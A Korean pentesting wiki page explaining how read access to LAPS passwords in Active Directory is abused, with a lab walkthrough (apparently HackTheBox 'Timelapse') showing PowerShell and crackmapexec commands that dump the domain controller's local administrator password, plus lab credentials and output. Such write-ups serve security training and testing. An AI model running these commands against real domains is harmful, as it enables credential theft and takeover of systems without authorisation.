펜테스팅 위키
  • Welcome
    • Home
  • 정보 수집
    • OSINT
      • Sub Domain
      • Google Hacking
      • Github
      • IP Address
      • Employees
    • 내부망
      • RID Cycling
      • Password Spraying
      • Password Must Change
      • Extension
        • xlsx/ods
        • pfx
        • vhd
        • pst
        • vbs
        • hc
      • Protocol
        • 21 - FTP
        • 22 - SSH
        • 25 - SMTP
        • 23 - Telnet
        • 53 - DNS
        • 80/443 - HTTP
        • 88 - Kerberos
        • 111 - RPC
        • 135 - msrpc
        • 139/445 - SMB
        • 389/636 - LDAP
        • 1433 - MSSQL
        • 5985/5986 - wsman
  • 초기 침투
    • CVEs
      • CVE-2025-31486
    • Phishing
      • Command File
      • EXE + LNK
      • wax
      • Microsoft Word
    • Web
      • Quary Language
        • SQL
        • GraphQL
      • File Upload
      • File Download
      • XSS
      • SSRF
      • CSRF
      • Open Redirect
      • SOP / CORS
    • ZIP Slip
  • 지속성
    • Active Directory
      • Golden Ticket
      • DC Shadow
      • RID Hijacking
    • Local
      • Task Scheduler
      • Startup Folder
      • Registry AutoRun
      • COM
      • WMI Event Subscription
      • SSH Key Injection
      • DLL Hijacking
      • DLL SideLoading
      • Create Account
  • 권한 상승
    • Active Directory
      • DACL
        • ReadGMSAPassword
        • ReadLAPSPassword
        • ForceChangePassword
        • AddSelf
        • WriteOwner
        • GenericAll
        • GenericWrite
        • WriteSPN
        • AddMembers
        • WriteProperty
        • WriteGPO
        • AddAllowedToAct
        • AllExtendedRights
      • AD CS
        • Abuse Permissions
        • ESC1
        • ESC2
        • ESC3
        • ESC4
        • ESC5
        • ESC6
        • ESC7
        • ESC8
        • ESC9
        • ESC10
        • ESC11
        • CVE-2022-26923
        • Non-PKINIT
      • MS14-068
      • Server Operators
      • DnsAdmins
      • noPac
      • Silver Ticket
      • KrbRelayUp
    • Windows
      • SeImpersonatePrivilege
      • Unquoted Service Path
      • Weak Service Permissions
      • Weak Service Binary Permissions
      • UAC Bypass
      • Always Install Elevated
      • Autoruns
      • Credential Manager
      • Local Service Account
  • 민감정보 탈취
    • Active Directory
      • DCSync
      • LSASS
      • AS-REP-Roasting
      • AS Requested Service Tickets
      • Kerberoasting
      • Targeted Kerberoast
      • Shadow Credentials
      • Backup Operators
      • SeEnableDelegationPrivilege
    • Windows
      • Unattended File
      • Browser Stored Credentials
      • NTLM Relay
      • Hard-coding Credentials
      • SeBackupPrivilege
  • 측면 이동
    • File Transfer
      • SCP
      • ZIP
      • ncat
      • Python
      • PowerShell
      • certutil
      • wget
      • SMB
      • Base64
      • FTP
      • WebDav
      • cURL
    • Port Forwarding
    • SMB/Windows Admin Shares
    • RDP
    • DCOM
    • WinRM
    • Domain Trust Discovery
  • ETC
    • CS
      • Kerberos
      • NTLM
      • PKINIT
      • Integrity
      • Registry
      • Active Directory Trusts
      • Delegation
      • OAuth 2.0
      • S4U
    • Tools
      • Cobalt Strike
      • BloodHound
      • Certipy-ad
      • LDAP Search
      • Hydra
Powered by GitBook
On this page
  • Practice
  • References

Was this helpful?

Export as PDF
  1. 권한 상승
  2. Active Directory
  3. DACL

ReadLAPSPassword

PreviousReadGMSAPasswordNextForceChangePassword

Last updated 5 months ago

Was this helpful?

LAPS는Localized Administrator Password Solution로

Windows Server Active Directory에 가입된 장치에서

로컬 관리자 계정 암호를 자동으로 관리하고 백업하는 서비스입니다.

주제에서 확인하듯 LAPS는 Windows 로컬 관리자 계정의 암호를 관리하는 서비스입니다.

이때 관리자 암호는 AD의 컴퓨터 객체 속성 중 ms-Mcs-AdmPwd에 저장되고

우리가 이 권한이 있을 때는 파워쉘 명령을 통해서 쉽게 확인이 가능합니다.

만약 LAPS로부터 도메인 컨트롤러 머신의 관리자 패스워드를 알게 되었을 때

이곳에서 LAPS를 통해 획득한 Administrator 계정의 패스워드로는

도메인 관리자 계정으로 로그인을 성공할 가능성도 있습니다.

그 이유는 도메인의 관리자 계정은 컨트롤러의 로컬 관리자 계정으로 사용되기 때문입니다.

Practice

*Evil-WinRM* PS C:\windows\temp> net groups LAPS_Readers
Group name     LAPS_Readers
Comment

Members

-------------------------------------------------------------------------------
svc_deploy
The command completed successfully.

획득한 쉘인 svc_deploy 사용자는 LAPS_Readers 그룹에 소속되어 있습니다.

현재 쉘에서 LAPS에서 관리하는 모든 관리자 계정에 대한

ms-Mcs-AdmPwd 값을 가져오는 명령은 다음과 같습니다.

*Evil-WinRM* PS C:\windows\temp> Get-ADComputer -Filter * -Property 'ms-Mcs-AdmPwd'
                                            
                                            
DistinguishedName : CN=DC01,OU=Domain Controllers,DC=timelapse,DC=htb                   
DNSHostName       : dc01.timelapse.htb      
Enabled           : True           
ms-Mcs-AdmPwd     : n((r2Ep}U@3&pw/v;1G%4SFr 
Name              : DC01              
ObjectClass       : computer
ObjectGUID        : 6e10b102-6936-41aa-bb98-bed624c9b98f
SamAccountName    : DC01$
SID               : S-1-5-21-671920749-559770252-3318990721-1000
UserPrincipalName :

이로써 로컬 관리자의 패스워드를 탈취했습니다.

만약 명령 프롬포트 환경을 갖지 못했다면 cme에서 제공하는 laps 모듈을 사용하여

LAPS에 저장된 패스워드 목록을 확인할 수 있습니다.

┌──(root㉿kali)-[~/Pentest/Machine]
└─# crackmapexec ldap 10.10.11.152 -u svc_deploy -p 'E3R$Q62^12p7PLlC%KWaxuaV' -M laps
SMB         10.10.11.152    445    DC01             [*] Windows 10 / Server 2019 Build 17763 x64 (name:DC01) (domain:timelapse.htb) (signing:True) (SMBv1:False)
LDAP        10.10.11.152    389    DC01             [+] timelapse.htb\svc_deploy:E3R$Q62^12p7PLlC%KWaxuaV 
LAPS        10.10.11.152    389    DC01             [*] Getting LAPS Passwords
LAPS        10.10.11.152    389    DC01             Computer: DC01$                Password: n((r2Ep}U@3&pw/v;1G%4SFr

References

LogoWindows LAPS overviewMicrosoftLearn
LogoConfigure Windows LAPS step by stepALI TAJRAN
LogoMicrosoft LAPS: What is it and why you should be using itInfoSec Governance -